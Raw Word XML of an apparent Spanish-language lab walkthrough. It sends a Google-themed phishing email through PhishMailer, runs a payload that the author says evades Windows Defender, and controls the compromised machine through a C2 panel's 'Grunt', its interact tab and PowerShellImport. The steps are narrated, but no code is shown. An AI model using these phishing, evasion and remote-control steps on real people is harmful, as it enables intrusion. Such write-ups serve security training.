      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C0BB39B" w14:textId="22BC7584" w:rsidR="00D1574E" w:rsidRDefault="00C43633" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32F50F03" wp14:editId="24F98293">
            <wp:extent cx="5400040" cy="1466850"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="132842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21834" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId312" cstate="screen">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="1466850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EC5C5A" w14:textId="77777777" w:rsidR="00266596" w:rsidRDefault="00266596" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31CBE0E4" w14:textId="2D0E59F0" w:rsidR="00266596" w:rsidRDefault="00266596" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Que será a quien le envíe el correo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60AEC8F4" w14:textId="1A9D29C7" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10DA9A25" w14:textId="0556F5B2" w:rsidR="00266596" w:rsidRDefault="00266596" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Primero lo que vamos hacer es guardar </w:t>
      </w:r>
      <w:r w:rsidR="00C66ABC">
        <w:t>nuestro</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> correo html en la </w:t>
      </w:r>
      <w:r w:rsidR="00E25D51">
        <w:t>ruta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> donde se guardan los templates en PhisMailer. Que es </w:t>
      </w:r>
      <w:r w:rsidRPr="00266596">
        <w:t>/home/parrot/Programas/PhishMailer/</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE7D87C" w14:textId="77777777" w:rsidR="00266596" w:rsidRDefault="00266596" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EFB6950" w14:textId="6E1DA567" w:rsidR="00266596" w:rsidRDefault="00BF28A1" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="025F5FF3" wp14:editId="55038D69">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="51473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30365" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId313"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43EEB2B8" w14:textId="77777777" w:rsidR="00BF28A1" w:rsidRDefault="00BF28A1" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57F3FAC3" w14:textId="711BECF1" w:rsidR="00BF28A1" w:rsidRDefault="00BF28A1" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="575DC093" wp14:editId="32632A8F">
            <wp:extent cx="5400040" cy="1437005"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1676531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1371" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId314" cstate="screen">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="1437005"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DAB8EC" w14:textId="77777777" w:rsidR="00266596" w:rsidRDefault="00266596" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7ABCAF90" w14:textId="38358DC4" w:rsidR="00BF28A1" w:rsidRDefault="00BF28A1" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora enviaremos el correo, para eso elegiremos la opción 30:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54572C41" w14:textId="77777777" w:rsidR="00BF28A1" w:rsidRDefault="00BF28A1" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="368AA537" w14:textId="625CDA9D" w:rsidR="00BF28A1" w:rsidRDefault="00BF28A1" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F3BB1BF" wp14:editId="5DC0906A">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1371756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6296" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId315"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029F609" w14:textId="77777777" w:rsidR="00BF28A1" w:rsidRDefault="00BF28A1" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2294D750" w14:textId="6F59EE3A" w:rsidR="00BF28A1" w:rsidRDefault="00BF28A1" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora la opción dos e elegiremos google.html</w:t>
      </w:r>
      <w:r w:rsidR="00C43633">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D370C1" w14:textId="77777777" w:rsidR="00C43633" w:rsidRDefault="00C43633" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A71E44B" w14:textId="3523C51A" w:rsidR="00C43633" w:rsidRDefault="00C43633" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Y configuraremos opciones:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D7602A" w14:textId="77777777" w:rsidR="00C43633" w:rsidRDefault="00C43633" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A61FF21" w14:textId="0D472049" w:rsidR="00C43633" w:rsidRDefault="00AD7F15" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CAE5959" wp14:editId="47A69A73">
            <wp:extent cx="6447619" cy="3790476"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="207792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1992" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId316">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6447619" cy="3790476"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7A830A" w14:textId="77777777" w:rsidR="00BF28A1" w:rsidRDefault="00BF28A1" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="082B1B5B" w14:textId="77777777" w:rsidR="00BF28A1" w:rsidRDefault="00BF28A1" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34718129" w14:textId="0F69EB01" w:rsidR="00266596" w:rsidRDefault="00C43633" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Llegando el correo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A40300E" w14:textId="77777777" w:rsidR="00C43633" w:rsidRDefault="00C43633" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EB21B86" w14:textId="5E264B4C" w:rsidR="00C43633" w:rsidRDefault="00C00E78" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E2378D9" wp14:editId="4C812F80">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="77313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1992" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId317" cstate="screen">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07298D20" w14:textId="77777777" w:rsidR="00C43633" w:rsidRDefault="00C43633" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C6020B8" w14:textId="798C5A23" w:rsidR="006428DF" w:rsidRDefault="00C43633" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Esta página de generación de correos tiene un problema y es que no carga bien el css, y por eso no se ve la plantilla que mande.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C34376" w14:textId="77777777" w:rsidR="0028446C" w:rsidRDefault="0028446C" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7ED3F1C8" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora lo ejecutaremos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EF75AD" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10C67695" w14:textId="77777777" w:rsidR="00C00E78" w:rsidRDefault="00C00E78" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3482369B" w14:textId="4EC37C0B" w:rsidR="006428DF" w:rsidRDefault="00BF28A1" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="006428DF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76214F52" wp14:editId="76ECFB31">
            <wp:extent cx="5400040" cy="2679065"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="686989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89259" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId318" cstate="screen">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="2679065"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD2B3D0" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5048EC55" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora para comprobar que funciona sacaré una captura de pantalla:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636CCDDB" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60223867" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C6D711F" wp14:editId="1DBD7BEF">
            <wp:extent cx="5399537" cy="3896139"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="188354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9375" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId319" cstate="screen">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5403800" cy="3899215"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDAC334" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="327F5811" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5AF06188" wp14:editId="52DA752C">
            <wp:extent cx="5400040" cy="2659380"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="1509035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5948" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId320" cstate="screen">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="2659380"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A62442A" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06DDDDBF" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21CDFFDD" wp14:editId="76DD83D2">
            <wp:extent cx="5400040" cy="2650490"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1390105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5585" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId321" cstate="screen">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08909DBD" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F001BBA" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Obteniendo la captura de pantalla con el Windows Defender activado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32346DA9" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="205FC3FD" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Por lo tanto de esta manera obtenemos una evasión del Windows Defender.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2671C882" w14:textId="77777777" w:rsidR="001F19CE" w:rsidRDefault="001F19CE" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="785BBBCE" w14:textId="77777777" w:rsidR="00F55BEE" w:rsidRDefault="00F55BEE" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FF8097C" w14:textId="432C0819" w:rsidR="00192263" w:rsidRDefault="00192263" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>El ID de conexión es diferente por que lo hice en momentos diferentes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163F6C04" w14:textId="77777777" w:rsidR="00192263" w:rsidRDefault="00192263" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38DFE1F8" w14:textId="311DB04A" w:rsidR="00F55BEE" w:rsidRDefault="00F55BEE" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora lo veremos en el panel de control:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4CAFCB" w14:textId="77777777" w:rsidR="00F55BEE" w:rsidRDefault="00F55BEE" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33E93F82" w14:textId="77777777" w:rsidR="00F55BEE" w:rsidRDefault="00F55BEE" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03CBDC61" w14:textId="77777777" w:rsidR="00F55BEE" w:rsidRDefault="00F55BEE" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="205F5B6C" w14:textId="77777777" w:rsidR="00F55BEE" w:rsidRDefault="00F55BEE" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01E2D3E1" w14:textId="77777777" w:rsidR="002C65FB" w:rsidRDefault="002C65FB" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E2E0896" w14:textId="77777777" w:rsidR="002C65FB" w:rsidRDefault="002C65FB" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="780F419B" w14:textId="77777777" w:rsidR="002C65FB" w:rsidRDefault="002C65FB" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A3D7EAC" w14:textId="77777777" w:rsidR="0063792B" w:rsidRDefault="0063792B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32E4DEE6" w14:textId="77777777" w:rsidR="00EB1B74" w:rsidRDefault="00EB1B74" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D3BD9C9" w14:textId="38B634DE" w:rsidR="00EB1B74" w:rsidRDefault="00C34717" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4117099B" wp14:editId="370554FB">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="139076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1442" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId322"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46379E42" w14:textId="77777777" w:rsidR="00C34717" w:rsidRDefault="00C34717" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68491E04" w14:textId="4092D242" w:rsidR="00C34717" w:rsidRDefault="00C34717" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ahora </w:t>
      </w:r>
      <w:r w:rsidR="00C66ABC">
        <w:t>h</w:t>
      </w:r>
      <w:r>
        <w:t>aremos clic en el Grunt:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A7EC05" w14:textId="77777777" w:rsidR="00C34717" w:rsidRDefault="00C34717" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66E8FCC8" w14:textId="11EB9012" w:rsidR="00C34717" w:rsidRDefault="00C34717" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1502C467" wp14:editId="0C8A98CB">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="401309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09127" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId323"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31FE28F" w14:textId="77777777" w:rsidR="00C34717" w:rsidRDefault="00C34717" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="745D0C20" w14:textId="255F1826" w:rsidR="00C34717" w:rsidRDefault="00C34717" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Pudiendo ver información sobre la conexión.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464B13BD" w14:textId="77777777" w:rsidR="00C34717" w:rsidRDefault="00C34717" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50543611" w14:textId="43729E47" w:rsidR="00EB1B74" w:rsidRDefault="00C34717" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>En la pestaña interact podremos ejecutar comandos en la máquina comprometida:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DF455B" w14:textId="77777777" w:rsidR="00C34717" w:rsidRDefault="00C34717" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="459EF23F" w14:textId="28432F48" w:rsidR="00C34717" w:rsidRDefault="00C34717" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3479B340" wp14:editId="18E35872">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2007594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94088" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId324"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19F1D10" w14:textId="77777777" w:rsidR="00EB1B74" w:rsidRDefault="00EB1B74" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26C7860D" w14:textId="5D09D1C2" w:rsidR="00EB1B74" w:rsidRDefault="00C34717" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Usando el comando PowerShellmport, podremos enviar scripts de PowerShell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C63B358" w14:textId="4BCDE7A2" w:rsidR="00C34717" w:rsidRDefault="00C34717" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="353C01CD" wp14:editId="1DFED4C1">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="516092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2044" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
